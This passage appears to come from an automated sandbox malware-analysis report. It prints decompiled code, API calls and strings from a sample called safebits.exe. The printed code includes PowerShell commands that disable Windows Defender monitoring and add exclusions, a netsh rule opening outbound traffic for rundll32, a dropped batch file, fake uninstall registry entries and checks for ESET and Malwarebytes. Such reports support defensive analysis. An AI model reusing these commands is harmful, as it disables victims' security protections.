                                                                • lstrcpyA.KERNEL32("C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402189
                                                                • lstrcatA.KERNEL32("C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 004021A3
                                                                • ShellExecuteExA.SHELL32(0044722B,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 004021EF
                                                                • Sleep.KERNEL32(000003E8,0044722B,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402202
                                                                • OpenMutexA.KERNEL32 ref: 0040221F
                                                                • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2707952b-6f11-481e-99be-b28317af8e3d,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,00100000,00000000,707952b-6f11-481e-99be-b28317af8e3d,000001F4,00100000,00000000,707952b-6f11-481e-99be-b28317af8e3d), ref: 0040225A
                                                                • lstrlenA.KERNEL32(2707952b-6f11-481e-99be-b28317af8e3d,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2707952b-6f11-481e-99be-b28317af8e3d,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,00100000,00000000,707952b-6f11-481e-99be-b28317af8e3d,000001F4,00100000,00000000), ref: 00402264
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,DisplayName,00000001,2707952b-6f11-481e-99be-b28317af8e3d,00000000,2707952b-6f11-481e-99be-b28317af8e3d,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2707952b-6f11-481e-99be-b28317af8e3d,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,00100000), ref: 00402280
                                                                • lstrlenA.KERNEL32(South Editor Ltd.,UninstallString,00000001,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,00000000,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,DisplayName,00000001,2707952b-6f11-481e-99be-b28317af8e3d,00000000,2707952b-6f11-481e-99be-b28317af8e3d,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2707952b-6f11-481e-99be-b28317af8e3d,00000000,00000000,00000000), ref: 0040229C
                                                                • RegCloseKey.ADVAPI32(Publisher,00000001,South Editor Ltd.,00000000,South Editor Ltd.,UninstallString,00000001,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,00000000,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,DisplayName,00000001,2707952b-6f11-481e-99be-b28317af8e3d,00000000,2707952b-6f11-481e-99be-b28317af8e3d,80000001), ref: 004022B9
                                                                • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,00100000,00000000,707952b-6f11-481e-99be-b28317af8e3d,000001F4,00100000,00000000,707952b-6f11-481e-99be-b28317af8e3d), ref: 004022DF
                                                                • lstrlenA.KERNEL32({4864a531-7c66-4f8b-8bca-339fdcb93393},80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,00100000,00000000,707952b-6f11-481e-99be-b28317af8e3d,000001F4,00100000,00000000), ref: 004022E9
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,DisplayName,00000001,{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,{4864a531-7c66-4f8b-8bca-339fdcb93393},80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,00100000), ref: 00402305
                                                                • lstrlenA.KERNEL32(South Editor Ltd.,UninstallString,00000001,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,00000000,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,DisplayName,00000001,{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,{4864a531-7c66-4f8b-8bca-339fdcb93393},80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,00000000,00000000), ref: 00402321
                                                                • RegCloseKey.ADVAPI32(Publisher,00000001,South Editor Ltd.,00000000,South Editor Ltd.,UninstallString,00000001,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,00000000,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,DisplayName,00000001,{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,{4864a531-7c66-4f8b-8bca-339fdcb93393},80000001), ref: 0040233E
                                                                • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,Publisher,00000001,South Editor Ltd.,00000000,South Editor Ltd.,UninstallString,00000001), ref: 00402364
                                                                • RegCloseKey.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,Publisher,00000001,South Editor Ltd.,00000000,South Editor Ltd.,UninstallString,00000001), ref: 0040236F
                                                                • GetTickCount.KERNEL32 ref: 00402374
                                                                • lstrcatA.KERNEL32(rundll32.exe, 6i/91,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,Publisher,00000001,South Editor Ltd.,00000000,South Editor Ltd.), ref: 00402396
                                                                • lstrlenA.KERNEL32(rundll32.exe,rundll32.exe, 6i/91,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,Publisher,00000001,South Editor Ltd.,00000000), ref: 004023A0
                                                                • RegCloseKey.ADVAPI32(IDFcan,00000001,rundll32.exe,00000000,rundll32.exe,rundll32.exe, 6i/91,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400), ref: 004023C8
                                                                • ExitProcess.KERNEL32(?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 004023D7
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,00000258,?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402407
                                                                • ExitProcess.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,00000258,?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402449
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: lstrcat$lstrlen$Sleep$Close$lstrcpy$Create$FileHandleModulePathProcess$ExecuteExitNameShellTemp$AddressCountCurrentDeleteDirectoryFolderMutexOpenProcTick_lwrite
                                                                • String ID: echo exit >> $echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> $start /min $ 6i/91$"$",xpi$"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91$"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe$.bat$2707952b-6f11-481e-99be-b28317af8e3d$707952b-6f11-481e-99be-b28317af8e3d$7sr48er48$C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe$C:\Users\user\AppData\Local\Temp\oh161a161.bat$C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe$C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll$C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi$DisplayName$IsWow64Process$Publisher$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2707952b-6f11-481e-99be-b28317af8e3d$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393}$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065}$South Editor Ltd.$UninstallString$\2707952b-6f11-481e-99be-b28317af8e3d.exe$\IDFcan$\jdfddn.dll$\miakhad.dll$echo timeout 3 > $echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te$jdfddn$kernel32$oh161a161.bat$open$rundll32.exe$setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"${4864a531-7c66-4f8b-8bca-339fdcb93393}$,
                                                                • API String ID: 3764267295-455028363
                                                                • Opcode ID: e34f5e8c899a677bad9d6b48a8b88ea52d3238adf7c3ac527ec171e2b32dc1d5
                                                                • Instruction ID: 1591e977169bb0be4debda6a2a8e8e43d9763fad91d46ce22df9f2f33243429f
                                                                • Opcode Fuzzy Hash: e34f5e8c899a677bad9d6b48a8b88ea52d3238adf7c3ac527ec171e2b32dc1d5
                                                                • Instruction Fuzzy Hash: 4C022620B843416DF7147B619D8BF9D2A426B5AB09F30603BF5017A2E3CBFC4A45575E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00401000, Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 58stringmemoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 86%
                                                                			_entry_(void* __ecx) {
				void* _t25;

				_t25 = __ecx;
				if(E00402B5E(0, _t9, lstrlenA(GetCommandLineA()), "setupqqadvfirewall firewall add rule name=\"Rundll32\" dir=out action=allow protocol=any program=\"C:\\Windows\\system32\\rundll32.exe\"", 7) != 0xffffffff) {
					ExitProcess();
					 *0x43f5e9 = 0x6e65706f;
					 *0x43f5ed = 0;
					0x447267->cbSize = 0x3c;
					 *0x0044726B = 0x40;
					 *0x00447273 = 0x43f5e9;
					 *0x00447277 = "netsh.exe";
					 *((intOrPtr*)(0x44727b)) = "advfirewall firewall add rule name=\"Rundll32\" dir=out action=allow protocol=any program=\"C:\\Windows\\system32\\rundll32.exe\"";
					 *0x00447283 = 0;
					GetVersion();
					GetWindowsDirectoryA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", 0x3e8);
					if( *((char*)(lstrlenA(?str?) - 1 + 0x44039c)) != 0x5c) {
						lstrcatA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", "\\system32\\WindowsPowershell\\v1.0\\powershell.exe");
					} else {
						lstrcatA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", "system32\\WindowsPowershell\\v1.0\\powershell.exe");
					}
					 *((intOrPtr*)(0x447277)) = 0x44039c;
					 *((intOrPtr*)(0x44727b)) = "Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll";
					ShellExecuteExA(0x447267);
					ExitProcess(??);
				}
				"jdfddn.dll" =  &("jdfddn.dll"[1]);
				"jdfddn" =  &("jdfddn"[1]); // executed
				GetForegroundWindow(); // executed
				 *0x449abb = GetTickCount();
				 *0x446edb = GetProcessHeap();
				return E0040128A(_t14, _t25, 0);
			}




                                                                0x00401000
                                                                0x00401020
                                                                0x00401026
                                                                0x0040102b
                                                                0x00401035
                                                                0x00401044
                                                                0x0040104a
                                                                0x00401051
                                                                0x00401058
                                                                0x0040105f
                                                                0x00401066
                                                                0x0040106f
                                                                0x00401080
                                                                0x00401097
                                                                0x004010b4
                                                                0x00401099
                                                                0x004010a3
                                                                0x004010a3
                                                                0x004010c0
                                                                0x004010c7
                                                                0x004010d3
                                                                0x004010d8
                                                                0x004010d8
                                                                0x004010dd
                                                                0x004010e3
                                                                0x004010e9
                                                                0x004010f3
                                                                0x004010fd
                                                                0x0040110b

                                                                APIs
                                                                • GetCommandLineA.KERNEL32 ref: 00401000
                                                                • lstrlenA.KERNEL32(00000000), ref: 00401008
                                                                • ExitProcess.KERNEL32(00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 00401026
                                                                • GetVersion.KERNEL32(?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 0040106F
                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8,?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 00401080
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8,?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 0040108A
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8,?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004010A3
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,\system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8,?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004010B4
                                                                • ShellExecuteExA.SHELL32(00447267,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,\system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8,?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004010D3
                                                                • ExitProcess.KERNEL32(00447267,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,\system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8,?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004010D8
                                                                • GetForegroundWindow.USER32(00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004010E9
                                                                • GetTickCount.KERNEL32 ref: 004010EE
                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004010F8
                                                                Strings
                                                                • \system32\WindowsPowershell\v1.0\powershell.exe, xrefs: 004010AA
                                                                • setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe", xrefs: 0040100F
                                                                • netsh.exe, xrefs: 00401058
                                                                • C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe, xrefs: 0040107B, 00401085, 0040109E, 004010AF, 004010C0
                                                                • jdfddn, xrefs: 004010E3
                                                                • open, xrefs: 00401051
                                                                • Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll, xrefs: 004010C7
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Process$Exitlstrcatlstrlen$CommandCountDirectoryExecuteForegroundHeapLineShellTickVersionWindowWindows
                                                                • String ID: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe$Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll$\system32\WindowsPowershell\v1.0\powershell.exe$jdfddn$netsh.exe$open$setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"
                                                                • API String ID: 2094461381-1796766458
                                                                • Opcode ID: 0c9e04671ade6d2247f4248d8aa14e731c24356128659f227a329f4a822deab0
                                                                • Instruction ID: de7a7ba0653631cf091694ff8dac02dc9aa62c69a0ee6aad78808433b7066509
                                                                • Opcode Fuzzy Hash: 0c9e04671ade6d2247f4248d8aa14e731c24356128659f227a329f4a822deab0
                                                                • Instruction Fuzzy Hash: 0A11D6B49503409AE3147F629C8BF083A94AB09B0DF10607FF5047B6E2CBFC861A8B5D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00401272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 68%
                                                                			E00401272(CHAR* __edx) {
				void* _t3;

				_t3 = OpenMutexA(0x100000, 0, __edx);
				if(_t3 != 0) {
					ExitProcess();
					return _t3;
				}
				return _t3;
			}




                                                                0x00401280
                                                                0x00401282
                                                                0x00401284
                                                                0x00000000
                                                                0x00401284
                                                                0x00401289

                                                                APIs
                                                                • OpenMutexA.KERNEL32 ref: 0040127B
                                                                • ExitProcess.KERNEL32(00100000,00000000,UEFIConfig,004012FD,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000), ref: 00401284
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ExitMutexOpenProcess
                                                                • String ID: UEFIConfig
                                                                • API String ID: 212532236-1949766427
                                                                • Opcode ID: a3de062cb0af37db89912758645813b9c9574f044c138b497a20feb44f0c02e0
                                                                • Instruction ID: e4f344dbafe8fc3efa988554db314d7de877d6890ccba575224d6ebf664b2d5f
                                                                • Opcode Fuzzy Hash: a3de062cb0af37db89912758645813b9c9574f044c138b497a20feb44f0c02e0
                                                                • Instruction Fuzzy Hash: F3B0125425000218DD5131B20C86B3A044D878D789F84386F3C00F01C5EA8C8C004139
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040128A, Relevance: 665.5, APIs: 197, Strings: 183, Instructions: 500threadregistrymemoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 82%
                                                                			E0040128A(void* __eax, void* __ecx) {
				char _v5;
				void* _t7;
				long _t192;
				long _t193;
				long _t194;
				long _t195;
				long _t196;
				long _t197;
				void* _t203;
				void* _t205;
				intOrPtr _t206;
				void* _t207;
				void* _t408;
				void* _t411;
				intOrPtr* _t415;

				_t7 = HeapAlloc(__eax, 8, 0x2c4024); // executed
				 *0x440860 = _t7;
				_t408 = 0xa;
				goto L1;
				do {
					L2:
					_t207 = 0xa;
					do {
						_t7 = _t7 + 1;
						asm("rol eax, 1");
						_t207 = _t207 - 1;
					} while (_t207 != 0);
					_t411 = _t411 - 1;
				} while (_t411 != 0);
				_t408 = _t408 - 1;
				if(_t408 != 0) {
					L1:
					_t411 = 0xf;
					goto L2;
				} else {
					_push(_t7);
					 *0x447213 =  &_v5 + 1;
					if(OpenMutexA(0x100000, 0, "52b-6f11-481e-99be-b28317af8e3d") != 0) {
						ExitProcess();
						 *0x4433cf = 1;
					}
					CreateMutexA(0, 0, "52b-6f11-481e-99be-b28317af8e3d"); // executed
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					if(OpenMutexA(0x100000, 0, "2707952b-6f11-481e-99be-b28317af8e3d") != 0) {
						ExitProcess();
						 *0x4433cf = 1;
					}
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread(); // executed
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					RtlExitUserThread();
					_t192 = RegOpenKeyExA(0x80000001, "Software\\ESET", 0, 0x20019, 0x4433fc); // executed
					_t193 = _t192;
					if(_t193 != 0) {
						_t194 = RegOpenKeyExA(0x80000002, "SYSTEM\\ControlSet001\\Services\\MBAMService", 0, 0x20019, 0x4433fc); // executed
						_t195 = _t194;
						if(_t195 != 0) {
							_t196 = RegOpenKeyExA(0x80000002, "SYSTEM\\ControlSet001\\Services\\MBAMService", 0, 0x20019, 0x4433fc); // executed
